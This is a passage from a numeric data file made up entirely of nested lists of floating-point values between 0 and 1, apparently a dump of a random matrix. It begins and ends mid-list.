0.071741389307587, 0.6240031940588721, 0.11370884998668773, 0.914513451103305, 0.17597493197990288, 0.46751975431587023, 0.47708462235011195, 0.46876628382492913, 0.46522519929436, 0.9202684873512351, 0.2080608071133505, 0.7892932803299003, 0.53884951140289, 0.9230920636585168, 0.8464885189583646, 0.11117188350699769, 0.03498702994169567, 0.6005399781033668, 0.2453880313427016, 0.4893759313725845, 0.42672916143574136, 0.19552448342138695, 0.9174798952797049, 0.8330849088114688, 0.7694111284586417, 0.6447263273982703, 0.4363511190901662, 0.03946076823619438, 0.8496284747699259, 0.27230046820131415, 0.00967916199902319, 0.4342519037765802, 0.835674087717838, 0.5026763575809863, 0.25242567021541895, 0.3619342956157996, 0.8783972945692003, 0.5900295714418082, 0.7409126565166102, 0.33056208243859875, 0.4310928989900411, 0.23197064066997475], [0.9672612628717029, 0.7549476674856538, 0.41998928394820867, 0.2992612845690634, 0.16005558213494164, 0.9252226144636976, 0.7428270098614156, 0.8535568604097897, 0.9226589541578119, 0.029816019200611943, 0.5811668267981728, 0.9065699930064296, 0.9910422651004673, 0.91917684042913, 0.11578938326098587, 0.13175010006965515, 0.534894254067312, 0.46226497891060514, 0.4271223213052008, 0.8613275568481644, 0.5453088076839855, 0.20459316095876057, 0.48691514730705643, 0.3596541231666336, 0.18527394047550028, 0.3463281658175761, 0.5083949318445959, 0.941909589094781, 0.19606991510467608, 0.8727800351408603, 0.8652384025039243, 0.4389442618170576, 0.47241635941462035, 0.954921580536099, 0.29189903067486955, 0.7396587003843998, 0.09103272300486154, 0.2897443278094951, 0.5726831083232797, 0.32929144334524185, 0.5542090416151821, 0.7849705561556838, 0.0837631119818818, 0.7996068490036525, 0.11222431942751476, 0.6242073712524293, 0.6932589715718123, 0.003960007483818084, 0.304375738984907, 0.08320186842811195, 0.3969801924808619, 0.14925809036038384, 0.7343706551922401, 0.10005293187868214, 0.7700729140479224, 0.5669713213289158, 
0.25555257946780485, 0.4724918808836006, 0.9191791608865799, 0.6151671319329918, 0.5768078376189982, 0.8835304480050363, 0.5085735032877438, 0.33626832495436876, 0.2478878883584581, 0.6821382294708774, 0.4319164786204157, 0.35750716287858453, 0.4675262776706487, 0.42564057602421357, 0.4908926618488364, 0.5105480995969054, 0.0016314128062669964, 0.9244071151799375, 0.8658256508548055, 0.9611054614673685, 0.4570967701721632, 0.39195954329084537, 0.8180497154423787, 0.8244291776563745, 0.9516553794020454, 0.32990994140605046, 0.4352794558690214, 0.4445199146968666, 0.7047427268905514, 0.29310922348990043, 0.012750945224687671, 0.26775609841815706, 0.7626379565899358], [0.45365113132648316, 0.8720900274930891, 0.9191439829865603, 0.5527492990288301, 0.5305975777998503, 0.6729969275159186, 0.487199454261557, 0.38587023261096676, 0.5714348466632854, 0.7955345520008231, 0.48338085746337267, 0.05235837681864908, 0.8093303671977242, 0.9140523249794883, 0.8973954475348158, 0.5248843086859181, 0.3315034185736029, 0.4445951042959321, 0.29240461148609087, 0.28768321287087384, 0.3872596709871783, 0.9153807380564669, 0.7771227135646818, 0.2516788296885394, 0.7479641943973943, 0.05505269561012183, 0.7921797686643154, 0.934529508336063, 0.687728633182449, 0.24126893625093204, 0.25266311426494203, 0.006720114358572671, 0.7251986998207857, 0.5858992033128897, 0.9778943351140168, 0.9846587091675765, 0.13407578847384094, 0.1285996254048376, 0.05611919683878097, 0.41463975248983065, 0.46659674064475054, 0.9243730699797271, 0.8400042994341437, 0.4291863853995169, 0.43142875482745247, 0.08875773193681735, 0.07824047692259117, 0.1768278762851997, 0.9627660028806695, 0.9292442531063778, 0.48040165322052675, 0.5278703729824156, 0.9250763710098033, 0.4049966143675232, 0.21922434769962107, 0.048505320396024953, 0.5513762364807503, 0.9740814089281237, 0.9727280476745481, 0.35459073396198837, 0.6263184861280302, 0.2725684750947157, 0.6144433863290694, 0.7108486516467465, 0.9826192271079089, 
0.04109997197975135, 0.06780418161366708, 0.05127670987726152, 0.2306751306684247, 0.8027429574562651, 0.5742873316090442, 0.7318382719436122, 0.5657922897888132, 0.389503421891643, 0.352823352945159, 0.4974212447613273, 0.7802617578093302, 0.7574648922846634, 0.36891043948202484, 0.9133573149707425, 0.6844671246969511, 0.7443562531602057, 0.39908316175459624, 0.8810652055388024, 0.2678786628069584, 0.8774314212848991, 0.9182825244785126, 0.94109104215407, 0.7661109730312469], [0.28102658290312343, 0.6675399713694437, 0.02637599027239501, 0.12122777345674152, 0.8647088008243533, 0.8873354836760975, 0.5463614874646883, 0.8063612010495345, 0.40803733457934266, 0.18925168219736976, 0.36968449995628916, 0.8060550400314102, 0.5577213759690646, 0.7376060968498541, 0.43127142815715935, 0.4509822083585815, 0.0720101202526856, 0.04299353756403823, 0.05856704469118501, 0.627258105071687, 0.8695784003038088, 0.6781222425365039, 0.45830732591930035, 0.871812520890627, 0.7032374847253904, 0.08659869452728464, 0.764683049571795, 0.7151376653665062, 0.45849371236048253, 0.662147937654955, 0.6038338101738641, 0.8214594183345119, 0.409211488545116, 0.9253545095386697, 0.6750481827881651, 0.4645182283421878, 0.07665821031430575, 0.4840197666603945, 0.9979008931608472, 0.4208429270348981, 0.6776073167710462, 0.4865032103314654, 0.6395741896180238, 0.0075945675958375425, 0.7664209142838236, 0.9164369820877328, 0.7262582968437862, 0.4280785997480394, 0.5227435842795608, 0.5005340085798784, 0.4966149893392101, 0.3484818504019934, 0.5320621948546478, 0.9874065282367146, 0.9426615786656032, 0.6222600855138842, 0.5952000567569442, 0.8546447101958297, 0.6131670649485476, 0.6315475428913977, 0.2741744618614177, 0.8652196372983686, 0.2763902081803249, 0.19493607154181114, 0.9730467911958566, 0.04485346737752682, 0.9509428112393947, 0.30356031129835914, 0.9448525690619709, 0.7605213660376637, 0.4794916706079485, 0.004814199432669142, 0.6980322498507293, 0.49519813068477736, 0.8093899743254392, 
0.9460344415148102, 0.42111693542424544, 0.5314813637776272, 0.2682724320276878, 0.7831994424119105, 0.06456394727544179, 0.16603630431167138, 0.7812824505883578, 0.4366365550556517, 0.7139898058064847, 0.11585995165193474, 0.1359872693202745, 0.22836611065278578, 0.7634390326075572], [0.2815928118657893, 0.6421557748083074, 0.07221245440324864, 0.24733677886356065, 0.7327505934540889, 0.2345108796148314, 0.19559760049175556, 0.9808964163981309, 0.22986966474029302, 0.0664847381017355, 0.020886548096090696, 0.3145967751409794, 0.7516287583536679, 0.2853119385114712, 0.5935894655967154, 0.6810953256701896, 0.14549445957525786, 0.7038430126676465, 0.24683636854163737, 0.21880343956942094, 0.7264892039336861, 0.8316728940836365, 0.9244548036760278, 0.8914554284532915, 0.6458527188375659, 0.6444364704687829, 0.7951538401051371, 0.3351025676937275, 0.6282517806312325, 0.7601222604306523, 0.7464242524025058, 0.7445279656996091, 0.11265276520565937, 0.09174653593544757, 0.8812372587956907, 0.6078649997312181, 0.10880433524049216, 0.6639602797517805, 0.3843478303027952, 0.251820769730991, 0.6390956588921013, 0.12160081809438661, 0.6936354096609435, 0.3154363031871422, 0.3178829408651026, 0.23378795983324396, 0.6755078991682946, 0.49277356892086566, 0.24249003961514326, 0.8815013063563807, 0.4516215459081706, 0.7152291776345004, 0.3960109082579346, 0.30284979111947374, 0.9904092131578917, 0.7620211276914811, 0.15975154656342538, 0.17539630151707064, 0.18016513699807424, 0.6907558763648234, 0.892672555294461, 0.007394242746436075, 0.7573683541601861, 0.5745636486419877, 0.8236206453557267, 0.7686773500566357, 0.6613022311895436, 0.7517589116317323, 0.579469229227495, 0.5182864640992512, 0.3889010996414244, 0.8620749501622571, 0.6601171211740994, 0.9695652710733513, 0.4555092278262415, 0.7461833301338536, 0.21718096742908088, 0.7098202144411001, 0.6856984960845128, 0.5935010194147405, 0.002163051905758162, 0.43390952418446616, 0.10938324324058779, 0.08220318650969383, 
0.18130086213499497, 0.039544212313441074, 0.9990759239737603, 0.6384695388631759, 0.3452301752983872], [0.24109150301289917, 0.32372111287753114, 0.07653511570702243, 0.21270701450026963, 0.12564927736361087, 0.11647944255110831, 0.4460649994306498, 0.36127310830659154, 0.2658767337783533, 0.041397322852893215, 0.8670159228544067, 0.3541875545281402, 0.34116762701263215, 0.3157374722638705, 0.9826396931623617, 0.4457203919983369, 0.24365559567713502, 0.25944923274762643, 0.4865397919569593, 0.2363074075142274, 0.6901162390818847, 0.08130003771560312, 0.1587083270453804, 0.7264484198370815, 0.8017841417309415, 0.8575384770736134, 0.10293642622989296, 0.9116312980202892, 0.5331276179018002, 0.30830770615187475, 0.7858717022485313, 0.5540433984700993, 0.53316972681342, 0.6957321421946101, 0.18161833367249858, 0.38819109285283016, 0.637982481240981, 0.12997178736374038, 0.637353005783506, 0.8233578720744779, 0.26784236991245614, 0.7679216146192962, 0.6363968869690759, 0.2795872234992065, 0.11044926841083103, 0.471847865552502, 0.3058934982132948, 0.6730874195362063, 0.4488121237636721, 0.7483218141361091, 0.09005646432172354, 0.7032063495455363, 0.930802028017315, 0.12015899419122733, 0.7841717385803408, 0.6624796023665821, 0.19962078514356973, 0.7723170326403372, 0.9999443303418527, 0.3088008449712276, 0.4624527221119398, 0.10090599920277643, 0.09252744227359788, 0.6363900031959746, 0.6585307915460383, 0.03059632763336484, 0.9812004260358894, 0.5896782617047055, 0.9554339982620612, 0.9523916606987308, 0.006630957727835507, 0.12833915895432846, 0.33083836309665127, 0.6534558922987322, 0.9074780436345463, 0.09308196930584911, 0.3322220752399876, 0.8658097513882973, 0.1481542524631284, 0.6053461850798914, 0.35142080818569943, 0.16790741730750736, 0.39285818447738585, 0.17185431490152037, 0.262280189728758, 0.6059373467108818, 0.6278196365157285, 0.41365585044659015, 0.4422852416465084], [0.6591967648658948, 0.16522060042030706, 0.2178158003875026, 0.06996671656220843, 
0.21453562722515263, 0.838495270965371, 0.12598607388500993, 0.8635321815717873, 0.4260900973737818, 0.492543311171594, 0.8646059813468949, 0.9919932937337068, 0.08099618321381885, 0.39128725498868133, 0.6403848241662378, 0.7655460073686464, 0.7567949082019568, 0.5486145249214119, 0.9800237606407411, 0.545397539146102, 0.7977974871803412, 0.3115602752918806, 0.26934562584491695, 0.8104545816093495, 0.6101271136857153, 0.4771495202515812, 0.26967546193071923, 0.9192018544797964, 0.8109280120677221, 0.2341654943180238, 0.17186972158645786, 0.7918742711194054, 0.03630560869364863, 0.9036952109975874, 0.3550340449942525, 0.35494773353938536, 0.3447916994570376, 0.19352110350464957, 0.8085012245233326, 0.5975345574050984, 0.43987317714589746, 0.46035486581610485, 0.36686172377342874, 0.05467043923854653, 0.8412616242992218, 0.5148148124982972, 0.1202542025302008, 0.6550828966271229, 0.6273623583883673, 0.5063672232038842, 0.4755120892426853, 0.030012281292476017, 0.4277239686677363, 0.9578371994556695, 0.3793734245593571, 0.30198126880463516, 0.7879622483757246, 0.29432155286243245, 0.06289276671610144, 0.08246536511965041, 0.7661039993359088, 0.8231086027955618, 0.5959719152179885, 0.012070351589330008, 0.17952996325339998, 0.1521821123014404, 0.6436262134291998, 0.6894708200538069, 0.6498121459788276, 0.2540481306076876, 0.7277799164899151, 0.123625984535781, 0.2584023948099561, 0.0828649716072809, 0.9044057295652801, 0.08185364699170872, 0.6161516468496842, 0.4147080958268625, 0.6210323335099277, 0.5853362506427632, 0.7965081197177837, 0.5516108898805426, 0.5093675322310807, 0.9199398473798442, 0.28920962843373577, 0.8271355625964802, 0.7017004309136745, 0.6238200931887335, 0.7342615781305649], [0.655890152753949, 0.6267107102256754, 0.7274325191322725, 0.43275881333033084, 0.0289198999492003, 0.5908388007273873, 0.2582876968152924, 0.8721503355412265, 0.8419966768350313, 0.7474726014932418, 0.9772009886312799, 0.7646477918635538, 0.8755093557668028, 
0.19611509243372394, 0.044344640590507245, 0.12001723716778723, 0.1546563715766679, 0.37984995550452816, 0.5637894814769718, 0.28869801149408303, 0.17778253224856144, 0.4385746947785921, 0.471979238973402, 0.5830493298155313, 0.40282718918102334, 0.24351028427649413, 0.8056474541838339, 0.12958547021420364, 0.06023030253306927, 0.9091124735167827, 0.08156454598172125, 0.9569831963676516, 0.0073453762756653385, 0.9748167205429961, 0.802769100368193, 0.1754041091385372, 0.8234709422927287, 0.5285533577785089, 0.3611080955688172, 0.7538217724990421, 0.5442135297383975, 0.17537782774744992, 0.7651937004042411, 0.9745303073489504, 0.737149536929269, 0.2943283257372862, 0.2923670683223072, 0.6977133655951058, 0.6096979456804081, 0.7986920572291966, 0.3408386110302507, 0.9035519033670925, 0.9081294923233973, 0.7971970337943273, 0.05983997009749298, 0.9771679664301355, 0.565968246018934, 0.4163253501048081, 0.36361595874186736, 0.5117960430093358, 0.8390405848072401, 0.16547512802259445, 0.6654891592863216, 0.5117157374105428, 0.8322140983167018, 0.3843264331100835, 0.43167618804782504, 0.2327197949222124, 0.4067627452235255, 0.638972900221592, 0.3291357916130446, 0.8427797791000053, 0.12321788408765477, 0.1982770592734726, 0.7389766984858515, 0.036617953634339506, 0.5918177615694417, 0.46802146837154435, 0.7495584766650523, 0.9993878672173147, 0.07052533525512228, 0.2605593408354726, 0.25910497689514644, 0.12155753193018703, 0.47354932081738, 0.30101725742553453, 0.44988069834569233, 0.5161931067525062, 0.2885050521282193], [0.11970511836677078, 0.9720160895064518, 0.3246424164426952, 0.21723611289703493, 0.035414622092900694, 0.24529852592649348, 0.2722891880741799, 0.499850005042214, 0.20145630588727903, 0.1459711808729005, 0.04520546545884785, 0.20112555117242703, 0.2894076550429734, 0.21819111959319137, 0.9464205680685482, 0.28732237882197464, 0.11537738097898032, 0.8551051875606274, 0.5573753381653325, 0.8445948645110066, 0.7746852325015731, 0.1941830174365895, 
0.2561239332778553, 0.7959321195800542, 0.7760778276951928, 0.7342238753660116, 0.2625071923740946, 0.697155931288141, 0.32375504150563306, 0.046985451151499213, 0.34801355304416504, 0.5506583267144037, 0.4006651192077908, 0.012832158021847007, 0.6758809380265863, 0.10141289097082595, 0.9702066621713097, 0.5646235729766642, 0.8325476436167865, 0.7682217919929928, 0.8617587057908741, 0.3300966614202542, 0.9434330995041073, 0.8877418065180903, 0.26770712355354565, 0.2136213309910744, 0.15045820361866435, 0.6879740843141939, 0.6641821423560198, 0.5482728443517759, 0.8057808209684176, 0.9902761453835169, 0.6135337226474069, 0.7914625880266036, 0.7639417238225087, 0.709135055899259, 0.85917827520488, 0.258565709495413, 0.20646040778471508, 0.24254874703171114, 0.2977462722295042, 0.9295417260487522, 0.744108322558439, 0.26761175983488594, 0.28948457466946753, 0.6650486136215279, 0.1351910159715053, 0.21846680821498254, 0.07585811778241747, 0.10135409018067265, 0.7102807294484744, 0.2346726914098325, 0.29934734355706627, 0.33102450198604016, 0.4325504289976432, 0.3343815423248766, 0.7837478487828495, 0.19713899722415495, 0.9014522118687555, 0.9626776655180953, 0.3949208960854468, 0.10071291855316511, 0.6038707916529708, 0.006558650580003267, 0.6092943107419194, 0.2448125561419061, 0.3088739542131669, 0.2015996333073513, 0.754993451369462], [0.7334598360323372, 0.6213122986627283, 0.5099671511689753, 0.6023208844699216, 0.3934514679469979, 0.03186254196026972, 0.6812223761823147, 0.39891940502528145, 0.41733988946478995, 0.9640833018077202, 0.7406911113895547, 0.06831774169310656, 0.45604131944659887, 0.036690593913055736, 0.21461459668661143, 0.7094638408309013, 0.7814218859158589, 0.8756943111040795, 0.6793527094967223, 0.8165173463940313, 0.08952842495581914, 0.6779247028948047, 0.5000674715946007, 0.8404049681384651, 0.4575360326272424, 0.47549580239814926, 0.24245867553301148, 0.40141269933879564, 0.6471005164841283, 0.40026117823219387, 0.34201226502492243, 
0.7677585029522445, 0.11905220179048193, 0.9741776072008831, 0.700337305589707, 0.2666614488633432, 0.03162646176331818, 0.17575227808441618, 0.44098427525365436, 0.21441244851156127, 0.7609837368077743, 0.10300856132070235, 0.15701221201495486, 0.2910445989050485, 0.02783779883288806, 0.88026699443597, 0.9764671038678243, 0.5804819125788806, 0.9584033036232809, 0.9734188346008469, 0.1471535275181406, 0.8949475656531718, 0.62446550958074, 0.1988089665207855, 0.2631457494290119, 0.2774720716106718, 0.5731470148122897, 0.09939334216889228, 0.11138347662407777, 0.3064944898270764, 0.8915315848921164, 0.1381387214950709, 0.49988996561234744, 0.10940178420946367, 0.18163288215500828, 0.19325292454922904, 0.756903393028079, 0.4332893823830972, 0.9397461668361746, 0.8503475069023211, 0.739191607174379, 0.7180213002210724, 0.2379112349840583, 0.7813055264745564, 0.35549338655335416, 0.05595516921544463, 0.06217189641866738, 0.07138064098610386, 0.394755073295731, 0.26933062242333106, 0.6452003933835241, 0.19088831087404035, 0.6503872346965611, 0.4862269879513481, 0.32792368010450046, 0.31190685128688045, 0.6541980173035392, 0.5355403082796331, 0.5349184655875114], [0.061944478495653876, 0.9218834766067425, 0.6157343772817337, 0.5541317889722753, 0.9765694851380337, 0.5520190487709714, 0.8298675518464287, 0.9584840011447893, 0.08047776093659054, 0.36061525710785347, 0.9543098765389603, 0.15996162026151217, 0.7769547370475819, 0.20419840017839197, 0.16087724190199526, 0.020488753135045723, 0.39166470865812775, 0.14098284402977945, 0.22344341303068982, 0.7245818369480193, 0.6441195961122892, 0.6169027321899068, 0.4775437661710459, 0.7631356261171676, 0.16983067815784014, 0.3390969559098077, 0.3118417205206393, 0.9088006250676585, 0.9254115677841083, 0.9997357550508311, 0.5750254694640379, 0.9034274838791181, 0.6187386707272009, 0.17345607055116652, 0.7240166901746571, 0.0777805166204909, 0.9274908527364186, 0.25489999351987713, 0.7778944507840992, 0.4310415464995596, 
0.7354681927280917, 0.7409902017128045, 0.3008133004637512, 0.8467907057945299, 0.7484799555098106, 0.5743758431503037, 0.12617549445577192, 0.8805329986724553, 0.7183467702438721, 0.2602203439864479, 0.03339719317635903, 0.045670039265412465, 0.12103879958840502, 0.06927791071142764, 0.37670081184683735, 0.8275016447969787, 0.1514186652787204, 0.6379975487728535, 0.8512706927726841, 0.2857544748448638, 0.6827500522522484, 0.6217459998624608, 0.6144047364655879, 0.9857143708547291, 0.25616697614146344, 0.002826728380292076, 0.6521691358080715, 0.45737280008186154, 0.744103260970887, 0.07236597608499984, 0.6882622141323181, 0.4213642044839885, 0.9245833703329958, 0.34474054371055307, 0.7007339415012795, 0.1083620067707518, 0.08405229496565014, 0.5204825195835768, 0.934983638665155, 0.6290521165378271, 0.2137522573882754, 0.40787203161995034, 0.08622807731788629, 0.1505024932090454, 0.744806809775807, 0.3577970211134588, 0.1855778026408681, 0.695100751524657, 0.39928213580978966], [0.09691542895648897, 0.6501530397773886, 0.2550564775564159, 0.6731167637768715, 0.29056533688516073, 0.09427391446756861, 0.9803480534930317, 0.7542864164293538, 0.578840583101294, 0.5232257378740325, 0.19904564962833649, 0.7845202567500448, 0.5106590042252319, 0.31980058773254216, 0.6986206956279947, 0.9110550619725549, 0.9588629749344665, 0.9884041226104342, 0.11637460639790387, 0.09044305155154442, 0.9719405047382967, 0.3551285644965715, 0.6705158884389929, 0.065147588726859, 0.787155833227741, 0.28464899333437177, 0.29679759082602586, 0.8257757845023331, 0.7312110728179452, 0.5557192552917193, 0.9154953065704262, 0.5397762921531886, 0.12722186274705582, 0.08994271884045768, 0.4027288358961818, 0.8387773638393714, 0.6631558551088157, 0.26794760768069703, 0.8748486620169538, 0.3560893550472849, 0.5838415956195117, 0.15623406651234406, 0.18203535941376825, 0.17776278585603433, 0.24890702818711397, 0.9045867569222873, 0.7642154984899315, 0.9316109009156385, 0.25088166800255196, 
0.6675442846220626, 0.9342508775666486, 0.11841423668508866, 0.908596223821084, 0.8239407983929453, 0.7345664292924594, 0.32446151307148197, 0.9100280529452304, 0.73218207939801, 0.31623859177450275, 0.09328177695028828, 0.06336233007647374, 0.34225417648222745, 0.21386016769890814, 0.6940246118667874, 0.47020083996685214, 0.9970096593221234, 0.33291887999479897, 0.8962783307864562, 0.11307750011093243, 0.38941736523552717, 0.764159166630869, 0.7527368616289494, 0.372538265485467, 0.7600070333667909, 0.04446527645507181, 0.7735040013166462, 0.14537530543648858, 0.12623534686976767, 0.8698919385176571, 0.20202455882277526, 0.3263852539150288, 0.8843660366778526, 0.1362771396538739, 0.267043244974153, 0.6441485000395049, 0.4838210828998889, 0.14594659829184786, 0.2064059862331301, 0.1865071853468997], [0.18020062662908343, 0.30551132099640554, 0.4928034106938415, 0.003515581554132341, 0.7905998185194624, 0.5611383020413825, 0.7056342363255641, 0.139436595683761, 0.4522379180673618, 0.5873027510646525, 0.6318489483703654, 0.9038440928331604, 0.38471290444226147, 0.22847603525824434, 0.9654413715737777, 0.894162097488138, 0.2939685002102237, 0.5129443797137926, 0.3438028381774195, 0.3258286605224975, 0.585026371075334, 0.6639978553113118, 0.6837762825599943, 0.19848209052207555, 0.835877273975075, 0.8329484834096774, 0.1861582772130862, 0.19129106919713101, 0.9227433019974682, 0.11905187802988981, 0.6914568601676114, 0.6266061919099049, 0.33838964785012693, 0.3275256071834589, 0.6559532445773761, 0.9219000057005576, 0.8111226772577241, 0.5656091935589119, 0.06702182271669987, 0.8106317345691909, 0.10264702127580194, 0.4015589559135615, 0.09594600954611021, 0.2349097538449344, 0.34539559811960374, 0.18263754425993395, 0.13529061938172016, 0.8637487993289741, 0.7677974377883298, 0.7036259175326771, 0.21596197931933148, 0.9005075337306461, 0.1619430222881133, 0.17511148583928704, 0.12412102274509018, 0.14819364686696435, 0.674482537859066, 0.5296306807918985, 
0.6280226837469606, 0.333313771062695, 0.943895632544215, 0.7515780939370794, 0.9368937058229262, 0.838034305920252, 0.27266000684474545, 0.6581696559643396, 0.02681687575792613, 0.8526133898723627, 0.7280512349193168, 0.450647931108782, 0.8049190489553621, 0.092136959550428, 0.8301290649637031, 0.24556280744756498, 0.9444399644199132, 0.2712122323601268, 0.23372585660600143, 0.43653245985663847, 0.5260959114023122, 0.08609006450712153, 0.3370411119962493, 0.7606857773125798, 0.7536293616760558, 0.9471170093509075, 0.1550423858001132, 0.2014696023032787, 0.3523100191011582, 0.6761212839688128, 0.31605615873336357], [0.8589989151034176, 0.9205879354613992, 0.5658009831022578, 0.6624919987316232, 0.4273855607975894, 0.6849108761575583, 0.3489914338585597, 0.5000230584598159, 0.4552142895910096, 0.7534918604856007, 0.05273816335335835, 0.2473006331081593, 0.814860459181089, 0.9449911111256152, 0.3154138180498095, 0.9539155572552921, 0.7518347596817878, 0.023365572020625502, 0.8557164044965091, 0.16082140754698482, 0.06813227614290063, 0.46125814170282886, 0.44881604387101826, 0.8947508086034578, 0.7319526998975955, 0.6179698175613877, 0.1685177356520109, 0.7955290147474942, 0.34295626021024017, 0.7302703745820324, 0.6290390223575885, 0.3150038134608073, 0.15589918075822473, 0.7330207159661721, 0.2003986209482228, 0.24754860139623647, 0.4985017018119946, 0.7748825507470459, 0.7237826771364506, 0.7833863487188091, 0.12692856850179002, 0.2995745146131802, 0.1885682589859884, 0.21601997676786366, 0.4956055410235216, 0.4665425825557502, 0.5689866549801549, 0.4537637369826174, 0.6865286320773621, 0.8834640556612271, 0.9523324054321538, 0.3915992083161357, 0.7467938380784069, 0.028975034653854093, 0.028615476110396054, 0.4084924283224488, 0.3462202741713203, 0.6925465780736153, 0.7344262037045248, 0.5502151394031952, 0.37506091340248493, 0.2333521019597834, 0.15158581857376907, 0.6116255944188178, 0.35563056950051486, 0.028116045453378646, 0.6978961968420584, 
0.339175472099702, 0.7078299546878752, 0.2301158217017839, 0.5372337967302829, 0.49813116607290453, 0.8743750556065111, 0.3169189865936647, 0.7180151044777112, 0.37800104622958963, 0.4376678102991368, 0.37431967128659227, 0.24172911674459252, 0.48529348810179496, 0.2895284185414577, 0.3794726383389032, 0.3768160754191633, 0.841996025660709, 0.19113799160208544, 0.23343123567923874, 0.3776082855417907, 0.693228116646905, 0.19818043710137934], [0.23442928790259254, 0.5270597398683236, 0.9434805575058122, 0.5183536391155518, 0.5225203572062653, 0.6303775221399587, 0.5710034547849748, 0.907250172587552, 0.48660604910115735, 0.8344378830300966, 0.5849143666263343, 0.9977636361888138, 0.6853981128782346, 0.023387737424950594, 0.8153129812128626, 0.8859341260575869, 0.46353854941422534, 0.9426018255212647, 0.17751878913452512, 0.6282171920417943, 0.6526018901557429, 0.7245822688329623, 0.3463983697012982, 0.36382161998442275, 0.007059603212630883, 0.7160621579791052, 0.3198660602195238, 0.09673339027606798, 0.058948450285090215, 0.4654432816415096, 0.18396626013159112, 0.35460661705655194, 0.4779687230862515, 0.08873213336421026, 0.31039181482779343, 0.8243197960672491, 0.7788657901338738, 0.5203322424391237, 0.16578876173631107, 0.010745951985762447, 0.2095169401470286, 0.08465991520628846, 0.7763756509042116, 0.7818553375093228, 0.4517786769989125, 0.8435066446008861, 0.5047500320263252, 0.6823487996504012, 0.32257139764610165, 0.25766419815084063, 0.35763845881218903, 0.19524691813616513, 0.6690296723598159, 0.8119236078290158, 0.25937986520576584, 0.5668127978721569, 0.020395613420555514, 0.5331479673310816, 0.2781821094486766, 0.007885819488966717, 0.49389016029641397, 0.6395695069820977, 0.5087845101809293, 0.8993590214919812, 0.7176105744308938, 0.7777230849334175, 0.10303890595706011, 0.47083379224363076, 0.7455708640875002, 0.9864302849355893, 0.8443083342610728, 0.3932019777964323, 0.4851928575497402, 0.7668609919871915, 0.4996680932413734, 0.9567544994329235, 
0.9580092619655727, 0.533813121745682, 0.22834630304698467, 0.505787431940156, 0.2993566372691855, 0.9094325127352475, 0.35519131276227245, 0.6516850554465219, 0.5348025073958135, 0.9010752275141855, 0.679590533146081, 0.6367129651722034, 0.3668922071224945], [0.6146764631187207, 0.8874186699171863, 0.8480399462325803, 0.20068766571497343, 0.20603462218590085, 0.7309106523058968, 0.7772921369986033, 0.11884218095788357, 0.4527952507109386, 0.8961245088401995, 0.4375461972499237, 0.9223645337288969, 0.5431079905378599, 0.3285898223343817, 0.41198341474158995, 0.1869340227090217, 0.25924361450262545, 0.1495219898575212, 0.2955139185493081, 0.9709498967366177, 0.45587515354253716, 0.5394637859629227, 0.20809095312967285, 0.3541174358473107, 0.12923438789431807, 0.28466121709499537, 0.4967473951829994, 0.39509479173112705, 0.30284538900951485, 0.5901314499471326, 0.951368281442547, 0.23913347604564927, 0.6382409390415342, 0.19604053086960427, 0.8043270927195658, 0.08926621675440516, 0.05908536651251228, 0.8656843554709941, 0.7637852854395647, 0.1526020845461602, 0.9804321908771156, 0.8932775996756526, 0.27710630733065467, 0.37487489227224857, 0.43330384227405694, 0.6780435928577319, 0.506874593284314, 0.703497188797841, 0.7981115280292056, 0.051908650116415433, 0.5170954091689609, 0.9634992418020359, 0.739939894346959, 0.2441148481659301, 0.6670235050087763, 0.11547114852680518, 0.8190056486576314, 0.7945736218468291, 0.8693898033925881, 0.502171190426245, 0.6715989550923769, 0.16868171654382724, 0.137538473865627, 0.97258428461369, 0.7817040672800186, 0.4039959100288911, 0.47468662396613714, 0.5515266017001743, 0.9360993415595585, 0.20174775607815687, 0.0252636844437234, 0.3364988436025218, 0.4786986166033752, 0.11748549112563955, 0.28959189806225005, 0.7789706367803032, 0.0264151165830373, 0.7550596849301799, 0.26105600674610596, 0.8518137455711262, 0.12299509668829278, 0.4201812831429419, 0.3636918364332651, 0.3682138525449974, 0.06524426363622382, 
0.6856822448052643, 0.7989409412337833, 0.7549553668407292, 0.34647289103998147], [0.6706394858686713, 0.21536097843621504, 0.3362709140715564, 0.6277614685838748, 0.14957815515240924, 0.07333258633236084, 0.09402794245542334, 0.7227322252688757, 0.1880275202623135, 0.583819827252326, 0.10072831267463689, 0.18770248873981676, 0.37607826401924627, 0.0023000646831671245, 0.44511082245634925, 0.4785569216883714, 0.9071936790935713, 0.6454786722056004, 0.9392748677234959, 0.7542278049775587, 0.7867061744003581, 0.9045141477092087, 0.4714758591930932, 0.7012148063559211, 0.467267836520909, 0.9457330968871313, 0.34471107732905126, 0.8522985865827729, 0.5612620546888427, 0.45030705350553313, 0.33781162988558155, 0.17829832710486015, 0.1298566608511743, 0.8239385711903983, 0.7361287020038201, 0.9880481773193808, 0.4916383814642198, 0.8813580378810841, 0.9447471903452505, 0.6796387066107975, 0.4435912646105554, 0.5469001847925956, 0.03845347628397022, 0.5561703545854974, 0.6786295123760606, 0.43944198678490165, 0.1056381702465764, 0.6666617282366329, 0.22106204476832614, 0.046301758313022634, 0.6308544238663649, 0.3824368965643292, 0.5206526562545688, 0.646420017882177, 0.9458896924706756, 0.9223731376962395, 0.7345294924096443, 0.6737843563558115, 0.15241341957827825, 0.4794788721548985, 0.3617093383564023, 0.2550688503141948, 0.12011578847553672, 0.4412933510597261, 0.76841154415333, 0.9956780068633927, 0.1326959140522408, 0.13815667885219474, 0.06564470780785481, 0.3339272573705976, 0.8648954481919148, 0.04706612680477462, 0.8838221244912521, 0.5140758865888385, 0.31982805440913775, 0.5617243562322743, 0.5237296824398704, 0.5152836045737891, 0.012164862079879435, 0.2477154434373664, 0.8987388992828378, 0.019634381008508228, 0.830604581800841, 0.31552045364671577, 0.5224802707463108, 0.08158240537656425, 0.8041713539528017, 0.4632973577346924, 0.3582620104868999], [0.019768651523478176, 0.13646752686882724, 0.624226760843699, 0.01277193590948511, 0.7865783839820537, 
